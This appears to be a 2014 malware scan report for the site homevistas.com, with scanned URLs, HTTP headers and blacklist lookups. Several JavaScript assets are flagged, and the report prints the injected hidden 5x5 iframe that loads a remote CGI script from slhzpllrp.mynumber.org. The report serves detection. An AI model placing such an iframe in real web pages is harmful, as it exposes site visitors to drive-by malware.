Scanned pages/files
| Request | Server response | Status |
http://homevistas.com/ | 200 OK Content-Length: 39068 Content-Type: text/html | clean |
http://homevistas.com/index.php/ru?jat3action=gzip&type=js&file=t3-assets%2Fjs68186.js&v=1 | 200 OK Content-Length: 114722 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://counter.rambler.ru/top100.jcn?2745404 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://homevistas.com/index.php/es | 200 OK Content-Length: 39892 Content-Type: text/html | clean |
http://homevistas.com/index.php/es?jat3action=gzip&type=js&file=t3-assets%2Fjs68186.js&v=1 | 200 OK Content-Length: 114722 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://homevistas.com/index.php/ru | 200 OK Content-Length: 39080 Content-Type: text/html | clean |
http://homevistas.com/index.php/en | 200 OK Content-Length: 39165 Content-Type: text/html | clean |
http://homevistas.com/index.php/en?jat3action=gzip&type=js&file=t3-assets%2Fjs68186.js&v=1 | 200 OK Content-Length: 114722 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://homevistas.com/index.php/ | 200 OK Content-Length: 39078 Content-Type: text/html | clean |
http://homevistas.com/index.php | 200 OK Content-Length: 39077 Content-Type: text/html | clean |
http://homevistas.com/index.php/ru/nedvizh | 200 OK Content-Length: 35154 Content-Type: text/html | clean |
http://homevistas.com/index.php/ru/nedvizh?jat3action=gzip&type=js&file=t3-assets%2Fjsfa11a.js&v=1 | 200 OK Content-Length: 99779 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://homevistas.com/index.php/es/viviendas | 200 OK Content-Length: 37170 Content-Type: text/html | clean |
http://homevistas.com/index.php/es/viviendas?jat3action=gzip&type=js&file=t3-assets%2Fjsfa11a.js&v=1 | 200 OK Content-Length: 99779 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://homevistas.com/index.php/en/nedvizh | 200 OK Content-Length: 35253 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: homevistas.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 12 Aug 2014 14:34:46 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 12 Aug 2014 14:34:48 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 079a3a4a462e468e21193fbd933bacec=59c2e008b9fcb864208576f6c15383b6; path=/
Set-Cookie: lang=deleted; expires=Mon, 12-Aug-2013 14:34:45 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Mon, 12-Aug-2013 14:34:45 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Mon, 12-Aug-2013 14:34:45 GMT; path=/
Set-Cookie: ja_portfolio_tpl=ja_portfolio; expires=Sun, 02-Aug-2015 14:34:46 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: homevistas.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 12 Aug 2014 14:34:46 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 12 Aug 2014 14:34:48 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 079a3a4a462e468e21193fbd933bacec=59c2e008b9fcb864208576f6c15383b6; path=/
Set-Cookie: lang=deleted; expires=Mon, 12-Aug-2013 14:34:45 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Mon, 12-Aug-2013 14:34:45 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Mon, 12-Aug-2013 14:34:45 GMT; path=/
Set-Cookie: ja_portfolio_tpl=ja_portfolio; expires=Sun, 02-Aug-2015 14:34:46 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: homevistas.com
Referer: http://www.google.com/search?q=homevistas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: homevistas.com
Referer: http://www.google.com/search?q=homevistas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homevistas.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://homevistas.com/
Result: homevistas.com is not infected or malware details are not published yet.
Result: homevistas.com is not infected or malware details are not published yet.